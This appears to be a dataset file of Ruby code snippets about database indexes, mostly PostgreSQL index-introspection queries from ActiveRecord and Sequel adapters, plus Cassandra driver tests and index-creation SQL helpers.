"def indexes(table_name, name = nil)\n schemas = schema_search_path.split(/,/).map { |p| quote(p) }.join(',')\n \n # Changed from upstread: link to pg_am to grab the index type (e.g. \"gist\")\n result = query(<<-SQL, name)\n SELECT distinct i.relname, d.indisunique, d.indkey, t.oid, am.amname\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n INNER JOIN pg_attribute a ON a.attrelid = t.oid\n INNER JOIN pg_am am ON i.relam = am.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname IN (#{schemas}) )\n ORDER BY i.relname\n SQL\n\n indexes = result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n oid = row[3]\n indtype = row[4]\n\n # Changed from upstream: need to get the column types to test for spatial indexes\n columns = query(<<-SQL, \"Columns for index #{row[0]} on #{table_name}\").inject({}) {|attlist, r| attlist[r[1]] = [r[0], r[2]]; attlist}\n SELECT a.attname, a.attnum, t.typname\n FROM pg_attribute a\n INNER JOIN pg_type t ON a.atttypid = t.oid\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n # Only GiST indexes on spatial columns denote a spatial index\n spatial = indtype == 'gist' && columns.size == 1 && (columns.values.first[1] == 'geometry' || columns.values.first[1] == 'geography')\n\n column_names = indkey.map {|attnum| columns[attnum] ? columns[attnum][0] : nil }.compact\n ActiveRecord::ConnectionAdapters::IndexDefinition.new(table_name, index_name, unique, column_names, spatial)\n end\n end",
"def supports_indexes_on_partitioned_tables?\n postgresql_version >= 110_000\n end",
"def add_indexes\n if hereditary? && !index_options[{ _type: 1 }]\n index({ _type: 1 }, { unique: false, background: true })\n end\n true\n end",
"def indexes(table_name, name = nil) #:nodoc:\n schemas = schema_search_path.split(/,/).map { |p| quote(p) }.join(',')\n result = query(<<-SQL, name)\nSELECT i.relname, d.indisunique, a.attname\nFROM pg_class t, pg_class i, pg_index d, pg_attribute a, pg_namespace n\nWHERE i.relkind = 'i'\nAND d.indexrelid = i.oid\nAND d.indisprimary = 'f'\nAND t.oid = d.indrelid\nAND t.relname = '#{table_name}'\nAND a.attrelid = t.oid\nAND n.nspname in (#{schemas})\nAND n.oid = t.relnamespace\nAND ( d.indkey[0]=a.attnum OR d.indkey[1]=a.attnum\nOR d.indkey[2]=a.attnum OR d.indkey[3]=a.attnum\nOR d.indkey[4]=a.attnum OR d.indkey[5]=a.attnum\nOR d.indkey[6]=a.attnum OR d.indkey[7]=a.attnum\nOR d.indkey[8]=a.attnum OR d.indkey[9]=a.attnum )\nORDER BY i.relname\nSQL\n \n current_index = nil\n indexes = []\n \n result.each do |row|\n if current_index != row[0]\n indexes << IndexDefinition.new(table_name, row[0], row[1] == \"t\", [])\n current_index = row[0]\n end\n \n indexes.last.columns << row[2]\n end\n \n indexes\n end",
"def _indexes_ds\n @_indexes_ds ||= begin\n if server_version >= 90500\n order = [Sequel[:indc][:relname], Sequel.function(:array_position, Sequel[:ind][:indkey], Sequel[:att][:attnum])]\n # :nocov:\n else\n range = 0...32\n order = [Sequel[:indc][:relname], SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(Sequel[:ind][:indkey], [x]), x]}, 32, Sequel[:att][:attnum])]\n # :nocov:\n end\n\n attnums = SQL::Function.new(:ANY, Sequel[:ind][:indkey])\n\n ds = metadata_dataset.\n from{pg_class.as(:tab)}.\n join(Sequel[:pg_index].as(:ind), :indrelid=>:oid).\n join(Sequel[:pg_class].as(:indc), :oid=>:indexrelid).\n join(Sequel[:pg_attribute].as(:att), :attrelid=>Sequel[:tab][:oid], :attnum=>attnums).\n left_join(Sequel[:pg_constraint].as(:con), :conname=>Sequel[:indc][:relname]).\n where{{\n indc[:relkind]=>%w'i I',\n ind[:indisprimary]=>false,\n :indexprs=>nil,\n :indisvalid=>true}}.\n order(*order).\n select{[indc[:relname].as(:name), ind[:indisunique].as(:unique), att[:attname].as(:column), con[:condeferrable].as(:deferrable)]}\n\n # :nocov:\n ds = ds.where(:indisready=>true) if server_version >= 80300\n ds = ds.where(:indislive=>true) if server_version >= 90300\n # :nocov:\n\n ds\n end\n end",
"def indexes(table_name, name = nil)\n # NOTE: maybe it's better to leave things of to the JDBC API ?!\n result = select_rows(<<-SQL, 'SCHEMA')\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname = ANY (current_schemas(false)) )\n ORDER BY i.relname\n SQL\n\n result.map! do |row|\n index_name = row[0]\n unique = row[1].is_a?(String) ? row[1] == 't' : row[1] # JDBC gets us a boolean\n # NOTE: this hack should no longer be needed ...\n # indkey = row[2].is_a?(Java::OrgPostgresqlUtil::PGobject) ? row[2].value : row[2]\n # indkey = indkey.split(\" \")\n indkey = row[2].split(' ')\n inddef = row[3]\n oid = row[4]\n\n columns = select_rows(<<-SQL, \"SCHEMA\")\n SELECT a.attnum, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n columns = Hash[ columns.each { |column| column[0] = column[0].to_s } ]\n column_names = columns.values_at(*indkey).compact\n\n unless column_names.empty?\n # add info on sort order for columns (only desc order is explicitly specified, asc is the default)\n desc_order_columns = inddef.scan(/(\\w+) DESC/).flatten\n orders = desc_order_columns.any? ? Hash[ desc_order_columns.map { |column| [column, :desc] } ] : {}\n\n if ::ActiveRecord::VERSION::MAJOR > 3 # AR4 supports `where` and `using` index options\n where = inddef.scan(/WHERE (.+)$/).flatten[0]\n using = inddef.scan(/USING (.+?) /).flatten[0].to_sym\n\n IndexDefinition.new(table_name, index_name, unique, column_names, [], orders, where, nil, using)\n else\n new_index_definition(table_name, index_name, unique, column_names, [], orders)\n end\n end\n end\n result.compact!\n result\n end",
"def test_can_create_index_on_partial_collections\n skip(\"Secondary index on partial collections were introduced in Cassandra 2.1\") if CCM.cassandra_version < '2.1.0'\n\n @session.execute(\"CREATE TABLE simplex.collection_test (a int PRIMARY KEY, b map<text, text>)\")\n @session.execute(\"CREATE INDEX b_index ON simplex.collection_test (keys(b))\")\n\n @listener.wait_for_index('simplex', 'collection_test', 'b_index')\n\n assert @cluster.keyspace('simplex').table('collection_test').has_index?('b_index')\n index = @cluster.keyspace('simplex').table('collection_test').index('b_index')\n assert_equal 'b_index', index.name\n assert_equal 'collection_test', index.table.name\n assert_equal :composites, index.kind\n assert_equal 'keys(b)', index.target\n\n @session.execute(\"DROP INDEX b_index\")\n @cluster.refresh_schema\n @session.execute(\"CREATE INDEX b_index ON simplex.collection_test (b)\")\n\n @listener.wait_for_index('simplex', 'collection_test', 'b_index')\n\n assert @cluster.keyspace('simplex').table('collection_test').has_index?('b_index')\n index = @cluster.keyspace('simplex').table('collection_test').index('b_index')\n assert_equal 'b_index', index.name\n assert_equal 'collection_test', index.table.name\n assert_equal :composites, index.kind\n if CCM.cassandra_version < '3.0.0'\n assert_equal 'b', index.target\n else\n assert_equal 'values(b)', index.target\n end\n end",
"def add_index_field(*) super end",
"def indexes(*rest) end",
"def indexes(*rest) end",
"def indexes(table_name, name = nil)\n schemas = schema_search_path.split(/,/).map { |p| quote(p) }.join(',')\n result = query(<<-SQL, name)\n SELECT i.relname, d.indisunique, d.indkey, t.oid, am.amname\n FROM pg_class t, pg_class i, pg_index d, pg_attribute a, pg_am am\n WHERE i.relkind = 'i'\n AND d.indexrelid = i.oid\n AND d.indisprimary = 'f'\n AND t.oid = d.indrelid\n AND i.relam = am.oid\n AND t.relname = '#{table_name}'\n AND a.attrelid = t.oid\n AND ( d.indkey[0]=a.attnum OR d.indkey[1]=a.attnum\n OR d.indkey[2]=a.attnum OR d.indkey[3]=a.attnum\n OR d.indkey[4]=a.attnum OR d.indkey[5]=a.attnum\n OR d.indkey[6]=a.attnum OR d.indkey[7]=a.attnum\n OR d.indkey[8]=a.attnum OR d.indkey[9]=a.attnum )\n ORDER BY i.relname\n SQL\n\n indexes = []\n\n indexes = result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n oid = row[3]\n spatial = row[4] == \"gist\"\n\n columns = query(<<-SQL, \"Columns for index #{row[0]} on #{table_name}\").inject({}) {|attlist, r| attlist[r[1]] = r[0]; attlist}\n SELECT a.attname, a.attnum\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n column_names = indkey.map {|attnum| columns[attnum] }\n ActiveRecord::ConnectionAdapters::IndexDefinition.new(table_name, index_name, unique, column_names, spatial)\n end\n\n indexes\n end",
"def index_bloat\n data = select(<<-SQL, \"Index Bloat\")\n SELECT tablename AS table_name\n , iname AS index_name\n , ituples::bigint AS rows\n , ipages::bigint AS pages\n , iotta AS otta\n , ROUND(CASE WHEN iotta = 0 OR ipages = 0 OR ipages = iotta THEN 0.0 ELSE ipages / iotta::numeric END, 1) AS percent_bloat\n , CASE WHEN ipages < iotta THEN 0 ELSE ipages::bigint - iotta END AS wasted_pages\n , CASE WHEN ipages < iotta THEN 0 ELSE (blocksize * (ipages - iotta))::bigint END AS wasted_size\n , CASE WHEN ipages < iotta THEN 0 ELSE blocksize * (ipages - iotta) END AS wasted_bytes\n\n FROM ( SELECT schemaname\n , tablename\n , cc.reltuples\n , cc.relpages\n , blocksize\n , CEIL((cc.reltuples * ((datahdr + pagesize - (CASE WHEN datahdr%pagesize = 0 THEN pagesize\n ELSE datahdr%pagesize END)) + nullhdr2 + 4)) / (blocksize - 20::float)\n ) AS otta\n , COALESCE(c2.relname,'?') AS iname, COALESCE(c2.reltuples, 0) AS ituples, COALESCE(c2.relpages, 0) AS ipages\n , COALESCE(CEIL((c2.reltuples * (datahdr - 12)) / (blocksize - 20::float)), 0) AS iotta\n FROM ( SELECT pagesize\n , blocksize\n , schemaname\n , tablename\n , (datawidth + (hdr + pagesize - (case when hdr%pagesize = 0 THEN pagesize ELSE hdr%pagesize END)))::numeric AS datahdr\n , (maxfracsum * (nullhdr + pagesize - (case when nullhdr%pagesize = 0 THEN pagesize ELSE nullhdr%pagesize END))) AS nullhdr2\n FROM ( SELECT schemaname\n , tablename\n , hdr\n , pagesize\n , blocksize\n , SUM((1 - null_frac) * avg_width) AS datawidth\n , MAX(null_frac) AS maxfracsum\n , hdr + ( SELECT 1 + count(*) / 8\n FROM pg_stats s2\n WHERE null_frac <> 0\n AND s2.schemaname = s.schemaname\n AND s2.tablename = s.tablename\n ) AS nullhdr\n FROM pg_stats s\n , ( SELECT\n (SELECT current_setting('block_size')::numeric) AS blocksize\n , CASE WHEN SUBSTRING(SPLIT_PART(v, ' ', 2) FROM '#\"[0-9]+.[0-9]+#\"%' for '#')\n IN ('8.0','8.1','8.2') THEN 27 ELSE 23 END AS hdr\n , CASE WHEN v ~ 'mingw32' OR v ~ '64-bit' THEN 8 ELSE 4 END AS pagesize\n FROM (SELECT version() AS v) AS foo\n ) AS constants\n GROUP BY 1, 2, 3, 4, 5\n ) AS foo\n ) AS rs\n JOIN pg_class cc\n ON cc.relname = rs.tablename\n JOIN pg_namespace nn\n ON cc.relnamespace = nn.oid\n AND nn.nspname = rs.schemaname AND nn.nspname <> 'information_schema'\n LEFT JOIN pg_index i\n ON indrelid = cc.oid\n LEFT JOIN pg_class c2\n ON c2.oid = i.indexrelid\n ) AS sml\n WHERE schemaname = 'public'\n ORDER BY 1, 2\n SQL\n\n integer_columns = %w(\n otta\n pages\n pagesize\n rows\n wasted_bytes\n wasted_pages\n wasted_size\n )\n\n float_columns = %w(\n percent_bloat\n )\n\n data.each do |datum|\n integer_columns.each { |c| datum[c] = datum[c].to_i }\n float_columns.each { |c| datum[c] = datum[c].to_f }\n end\n\n data.to_a\n end",
"def supports_index_null_order?\n false\n end",
"def create_hypothetical_index(table, col_set)\n execute(\"SELECT * FROM hypopg_create_index('CREATE INDEX ON #{quote_ident(table)} (#{col_set.map {|c| quote_ident(c[:column])}.join(\", \")})')\").first[\"indexname\"]\n end",
"def small_search(relation)\n Post.transaction do\n Post.connection.execute(\"SET LOCAL enable_seqscan = off\")\n Post.connection.execute(\"SET LOCAL enable_indexscan = off\")\n relation.load\n end\n end",
"def test_can_create_multiple_indexes_same_column\n skip(\"Multiple indexes on same column were introduced in Cassandra 3.0.0\") if CCM.cassandra_version < '3.0.0'\n\n @session.execute(\"CREATE TABLE simplex.multi_index_test (a int PRIMARY KEY, b map<text, text>)\")\n @session.execute(\"CREATE INDEX key_index ON simplex.multi_index_test (keys(b))\")\n @session.execute(\"CREATE INDEX value_index ON simplex.multi_index_test (values(b))\")\n\n @listener.wait_for_index('simplex', 'multi_index_test', 'key_index')\n @listener.wait_for_index('simplex', 'multi_index_test', 'value_index')\n\n assert @cluster.keyspace('simplex').table('multi_index_test').has_index?('key_index')\n assert @cluster.keyspace('simplex').table('multi_index_test').has_index?('value_index')\n\n key_index = @cluster.keyspace('simplex').table('multi_index_test').index('key_index')\n assert_equal 'key_index', key_index.name\n assert_equal 'multi_index_test', key_index.table.name\n assert_equal :composites, key_index.kind\n assert_equal 'keys(b)', key_index.target\n\n value_index = @cluster.keyspace('simplex').table('multi_index_test').index('value_index')\n assert_equal 'value_index', value_index.name\n assert_equal 'multi_index_test', value_index.table.name\n assert_equal :composites, value_index.kind\n assert_equal 'values(b)', value_index.target\n end",
"def supports_indexes_in_create?\n false\n end",
"def supports_indexes_in_create?\n false\n end",
"def primary_key_index_re\n /\\Asys_/i\n end",
"def indexes(table_name)\n\n # FIXME: AR version => table = Utils.extract_schema_qualified_name(table_name.to_s)\n schema, table = extract_schema_and_table(table_name.to_s)\n\n result = query(<<-SQL, 'SCHEMA')\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid,\n pg_catalog.obj_description(i.oid, 'pg_class') AS comment\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n LEFT JOIN pg_namespace n ON n.oid = i.relnamespace\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table}'\n AND n.nspname = #{schema ? \"'#{schema}'\" : 'ANY (current_schemas(false))'}\n ORDER BY i.relname\n SQL\n\n result.map do |row|\n index_name = row[0]\n # FIXME: These values [1,2] are returned in a different format than AR expects, maybe we could update it on the Java side to be more accurate\n unique = row[1].is_a?(String) ? row[1] == 't' : row[1] # JDBC gets us a boolean\n indkey = row[2].is_a?(Java::OrgPostgresqlUtil::PGobject) ? row[2].value : row[2]\n indkey = indkey.split(\" \").map(&:to_i)\n inddef = row[3]\n oid = row[4]\n comment = row[5]\n\n using, expressions, where = inddef.scan(/ USING (\\w+?) \\((.+?)\\)(?: WHERE (.+))?\\z/m).flatten\n\n orders = {}\n opclasses = {}\n\n if indkey.include?(0)\n columns = expressions\n else\n columns = Hash[query(<<-SQL.strip_heredoc, \"SCHEMA\")].values_at(*indkey).compact\n SELECT a.attnum, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n # add info on sort order (only desc order is explicitly specified, asc is the default)\n # and non-default opclasses\n expressions.scan(/(?<column>\\w+)\\s?(?<opclass>\\w+_ops)?\\s?(?<desc>DESC)?\\s?(?<nulls>NULLS (?:FIRST|LAST))?/).each do |column, opclass, desc, nulls|\n opclasses[column] = opclass.to_sym if opclass\n if nulls\n orders[column] = [desc, nulls].compact.join(' ')\n elsif desc\n orders[column] = :desc\n end\n end\n end\n\n IndexDefinition.new(\n table_name,\n index_name,\n unique,\n columns,\n orders: orders,\n opclasses: opclasses,\n where: where,\n using: using.to_sym,\n comment: comment.presence\n )\n end\n end",
"def primary_key_index_re\n PRIMARY_KEY_INDEX_RE\n end",
"def primary_key_index_re\n PRIMARY_KEY_INDEX_RE\n end",
"def supports_index_include?\n false\n end",
"def indexes(table_name)\n scope = quoted_scope(table_name)\n\n result = query(<<-SQL, \"SCHEMA\")\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid,\n pg_catalog.obj_description(i.oid, 'pg_class') AS comment\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n LEFT JOIN pg_namespace n ON n.oid = i.relnamespace\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = #{scope[:name]}\n AND n.nspname = #{scope[:schema]}\n ORDER BY i.relname\n SQL\n\n result.map do |row|\n index_name = row[0]\n unique = row[1]\n indkey = row[2].split(\" \").map(&:to_i)\n inddef = row[3]\n oid = row[4]\n comment = row[5]\n\n using, expressions, where = inddef.scan(/ USING (\\w+?) \\((.+?)\\)(?: WHERE (.+))?\\z/m).flatten\n\n orders = {}\n opclasses = {}\n\n if indkey.include?(0)\n definition = inddef.sub(INDEX_WHERE_EXPRESSION, '')\n\n if column_expression = definition.match(INDEX_COLUMN_EXPRESSION)[1]\n columns = split_expression(expressions).map do |functional_name|\n remove_type(functional_name)\n end\n\n columns = columns.size > 1 ? columns : columns[0]\n end\n else\n columns = Hash[query(<<-SQL.strip_heredoc, \"SCHEMA\")].values_at(*indkey).compact\n SELECT a.attnum, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n # add info on sort order (only desc order is explicitly specified, asc is the default)\n # and non-default opclasses\n expressions.scan(/(?<column>\\w+)\"?\\s?(?<opclass>\\w+_ops)?\\s?(?<desc>DESC)?\\s?(?<nulls>NULLS (?:FIRST|LAST))?/).each do |column, opclass, desc, nulls|\n opclasses[column] = opclass.to_sym if opclass\n if nulls\n orders[column] = [desc, nulls].compact.join(\" \")\n else\n orders[column] = :desc if desc\n end\n end\n end\n\n IndexDefinition.new(\n table_name,\n index_name,\n unique,\n columns,\n orders: orders,\n opclasses: opclasses,\n where: where,\n using: using.to_sym,\n comment: comment.presence\n )\n end\n end",
"def add_index(table_name,column_name,options = {})\n index_name = options[:name] || index_name(table_name,:column => Array(column_name))\n \n if options[:spatial]\n execute \"CREATE SPATIAL INDEX #{index_name} ON #{table_name} (#{Array(column_name).join(\", \")})\"\n else\n super\n end\n end",
"def to_create_composite_index_sql\n queries = []\n unless composite_indexes.blank?\n composite_indexes.each do |columns, unique|\n sql = \"CREATE #{unique ? 'UNIQUE ' : ''}INDEX \"\n sql << \"#{to_s.downcase}_#{columns.join('_')}_index ON \"\n sql << \"#{to_sql} (#{columns.join(', ')})\"\n queries << sql.compress_lines\n end\n end\n queries\n end",
"def index_rejected_columns\n %w[id]\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n if index[:type]\n raise Error, \"Index types are not supported for this database\"\n elsif index[:where]\n raise Error, \"Partial indexes are not supported for this database\"\n else\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{index_name} ON #{quote_identifier(table_name)} #{literal(index[:columns])}\"\n end\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n if index[:type]\n raise Error, \"Index types are not supported for this database\"\n elsif index[:where]\n raise Error, \"Partial indexes are not supported for this database\"\n else\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_identifier(table_name)} #{literal(index[:columns])}\"\n end\n end",
"def require_index(name); end",
"def require_index(name); end",
"def indexes(_table_name, _name = nil)\n []\n end",
"def indexes\n raise 'not implemented'\n end",
"def test_can_create_index_on_full_collections\n skip(\"Secondary index on full collections were introduced in Cassandra 2.1.3\") if Gem::Version.new(CCM.cassandra_version) < Gem::Version.new('2.1.3')\n\n @session.execute(\"CREATE TABLE simplex.collection_test (a int PRIMARY KEY, b frozen<map<text, text>>)\")\n @session.execute(\"CREATE INDEX b_index ON simplex.collection_test (full(b))\")\n\n @listener.wait_for_index('simplex', 'collection_test', 'b_index')\n\n assert @cluster.keyspace('simplex').table('collection_test').has_index?('b_index')\n index = @cluster.keyspace('simplex').table('collection_test').index('b_index')\n assert_equal 'b_index', index.name\n assert_equal 'collection_test', index.table.name\n assert_equal :composites, index.kind\n if CCM.cassandra_version < '3.0.0'\n assert_equal 'b', index.target\n else\n assert_equal 'full(b)', index.target\n end\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n if index[:type]\n raise Error, \"Index types are not supported for this database\"\n elsif index[:where]\n raise Error, \"Partial indexes are not supported for this database\"\n else\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_identifier(table_name)} #{literal(index[:columns])}\"\n end\n end",
"def change\n \tenable_extension 'btree_gin'\n \tadd_index :users,[:first_name, :last_name, :email], using: :gin, algorithm: :concurrently\n end",
"def indexes(table_name, name = nil)\n opclasses\n result = select_rows(<<-SQL, name)\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname = ANY (current_schemas(false)) )\n ORDER BY i.relname\n SQL\n result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n inddef = row[3]\n oid = row[4]\n\n columns = Hash[select_rows(<<-SQL, \"Columns for index #{row[0]} on #{table_name}\")]\n SELECT a.attnum::text, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n column_names = columns.values_at(*indkey).compact\n\n # add info on sort order for columns (only desc order is explicitly specified, asc is the default)\n desc_order_columns = inddef.scan(/(\\w+) DESC/).flatten\n orders = desc_order_columns.any? ? Hash[desc_order_columns.map {|order_column| [order_column, :desc]}] : {}\n #changed from rails 3.2\n where = inddef.scan(/WHERE (.+)$/).flatten[0]\n index_type = inddef.scan(/USING (.+?) /).flatten[0].to_sym\n if index_type\n index_op = inddef.scan(/USING .+? \\(.+? (#{opclasses.join('|')})\\)/).flatten\n index_op = index_op[0].to_sym if index_op.present?\n end\n if column_names.present?\n index_def = IndexDefinition.new(table_name, index_name, unique, column_names, [], orders)\n index_def.where = where\n index_def.index_type = index_type if index_type && index_type != :btree\n index_def.index_opclass = index_op if index_type && index_type != :btree && index_op\n index_def\n # else nil\n end\n #/changed\n end.compact\n end",
"def indexes(table, opts=OPTS)\n m = output_identifier_meth\n cond = {Sequel[:tab][:oid]=>regclass_oid(table, opts)}\n cond[:indpred] = nil unless opts[:include_partial]\n\n indexes = {}\n _indexes_ds.where_each(cond) do |r|\n i = indexes[m.call(r[:name])] ||= {:columns=>[], :unique=>r[:unique], :deferrable=>r[:deferrable]}\n i[:columns] << m.call(r[:column])\n end\n indexes\n end",
"def indexes(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n {}\n end",
"def primary_key_index_re\n /\\Apk__/i\n end",
"def primary_key_index_re\n /\\Apk__/i\n end",
"def indexes(table, opts=OPTS)\n return super unless opts.empty?\n\n quoted_name = literal(table)\n if v = Sequel.synchronize{@indexes[quoted_name]}\n return v\n end\n\n result = super\n Sequel.synchronize{@indexes[quoted_name] = result}\n result\n end",
"def index_valid?\n false\n end",
"def add_index(table_name, column_name, options = {})\n index_name = options[:name] || index_name(table_name,:column => Array(column_name))\n if options[:spatial]\n execute \"CREATE INDEX #{index_name} ON #{table_name} USING GIST (#{Array(column_name).join(\", \")} GIST_GEOMETRY_OPS)\"\n else\n super\n end\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n raise Error, \"Index types are not supported for this database\" if index[:type]\n raise Error, \"Partial indexes are not supported for this database\" if index[:where] && !supports_partial_indexes?\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_schema_table(table_name)} #{literal(index[:columns])}#{\" WHERE #{filter_expr(index[:where])}\" if index[:where]}\"\n end",
"def simple_table_scan?\n @rows.size == 1 &&\n (@row['using_index'] || !(@query.sql =~ /\\s+WHERE\\s+/i)) &&\n (@row['access_type'] == \"index\" || (@query.sql !~ /order by/i)) &&\n @query.limit\n end",
"def test_indexes\n idx_name = \"accounts_idx\"\n\n indexes = @connection.indexes(\"accounts\")\n assert_empty indexes\n\n @connection.add_index :accounts, :firm_id, name: idx_name\n indexes = @connection.indexes(\"accounts\")\n assert_equal \"accounts\", indexes.first.table\n assert_equal idx_name, indexes.first.name\n assert !indexes.first.unique\n assert_equal [\"firm_id\"], indexes.first.columns\n ensure\n @connection.remove_index(:accounts, name: idx_name) rescue nil\n end",
"def test_indexes\n idx_name = \"accounts_idx\"\n\n indexes = @connection.indexes(\"accounts\")\n assert_empty indexes\n\n @connection.add_index :accounts, :firm_id, name: idx_name\n indexes = @connection.indexes(\"accounts\")\n assert_equal \"accounts\", indexes.first.table\n assert_equal idx_name, indexes.first.name\n assert !indexes.first.unique\n assert_equal [\"firm_id\"], indexes.first.columns\n ensure\n @connection.remove_index(:accounts, name: idx_name) rescue nil\n end",
"def index_exists?(table_name, column_name, options = {})\n column_names = Array.wrap(column_name)\n index_name = options.key?(:name) ? options[:name].to_s : index_name(table_name, column: column_names)\n\n # Always compare the index name\n default_comparator = lambda { |index| index.name == index_name }\n comparators = [default_comparator]\n\n # Add a comparator for each index option that is part of the query\n index_options = [:unique, :where]\n index_options.each do |index_option|\n comparators << if options.key?(index_option)\n lambda do |index|\n pg_where_clause = index.send(index_option)\n # pg does nothing to boolean clauses, e.g. 'where active' => 'where active'\n if pg_where_clause.is_a?(TrueClass) or pg_where_clause.is_a?(FalseClass)\n pg_where_clause == options[index_option]\n else\n # pg adds parentheses around non-boolean clauses, e.g. 'where color IS NULL' => 'where (color is NULL)'\n pg_where_clause.gsub!(/[()]/,'')\n # pg casts string comparison ::text. e.g. \"where color = 'black'\" => \"where ((color)::text = 'black'::text)\"\n pg_where_clause.gsub!(/::text/,'')\n # prevent case from impacting the comparison\n pg_where_clause.downcase == options[index_option].downcase\n end\n end\n else\n # If the given index_option is not an argument to the index_exists? query,\n # select only those pg indexes that do not have the component\n lambda { |index| index.send(index_option).blank? }\n end\n end\n\n # Search all indexes for any that match all comparators\n indexes(table_name).any? do |index|\n comparators.inject(true) { |ret, comparator| ret && comparator.call(index) }\n end\n end",
"def index_options\n return false unless index && index == entity.key_column\n if entity.is_core\n { unique: true }\n else\n true\n end\n end",
"def construct_index\n end",
"def to_create_index_sql\n queries = []\n unless indexes.blank?\n indexes.each do |column|\n sql = \"CREATE INDEX #{to_s.downcase}_#{column}_index ON \"\n sql << \"#{to_sql} (#{column.to_sql})\"\n queries << sql.compress_lines\n end\n end\n queries\n end",
"def index_relations(exclude_relations: []); end",
"def supports_index_operator_class?\n false\n end",
"def with_index(name = nil, &block)\n name ||= caller(1)[0].match(/in `(.*)'\\z/)[1]\n mapper.indexes[name.to_s] or begin\n indexable = yield\n mapper.add_index(name, indexable)\n end\n end",
"def multi_column_index_limit\n @multi_column_index_limit ||= 32\n end",
"def index_on( field, opts={} )\n opts = Gnash.new( opts )\n design_document(true).add!( opts.merge!(:name => field) )\n unless indexes.include?( field )\n indexes << field.to_sym \n indexes << field.to_s \n end \n self \n end",
"def index_valid?(index)\n index > -1 && index != length ? true : false\n end",
"def indices(*rest) end",
"def indices(*rest) end",
"def has_index?\n INDEX_REGEXP =~ rootname_minus_role\n end",
"def should_index?\n\t\t!deleted?\n \tend",
"def indexes_per_table\n 65_535\n end",
"def has_unique_index(name, *fields)\n indexes[name] = fields\n end",
"def get_indexes\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n i.relname,\n ri.indisprimary,\n pg_get_indexdef(i.oid)\n FROM\n pg_class r,\n pg_class i,\n pg_index ri\n WHERE\n ri.indexrelid = i.oid\n AND ri.indrelid = r.oid\n AND r.relkind = 'r'\n AND i.relkind = 'i'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = Hash.new(){|hash, key| hash.store(key, [])}\n results.each do |row|\n table, index, primary_key, create_sql = row.split(/\\t/)\n hash[table] << {:index => index, :primary_key => primary_key == 't', :create_sql => create_sql}\n end\n hash\n end",
"def test_can_create_index\n @session.execute(\"CREATE TABLE simplex.test (a text PRIMARY KEY, b text)\")\n @session.execute(\"CREATE INDEX b_index ON simplex.test (b)\")\n\n @listener.wait_for_index('simplex', 'test', 'b_index')\n\n assert @cluster.keyspace('simplex').table('test').has_index?('b_index')\n index = @cluster.keyspace('simplex').table('test').index('b_index')\n assert @cluster.keyspace('simplex').has_index?('b_index')\n assert_same(index, @cluster.keyspace('simplex').index('b_index'))\n assert_equal 'b_index', index.name\n assert_equal 'test', index.table.name\n assert_equal :composites, index.kind\n assert_equal 'b', index.target\n end",
"def index_signature; end",
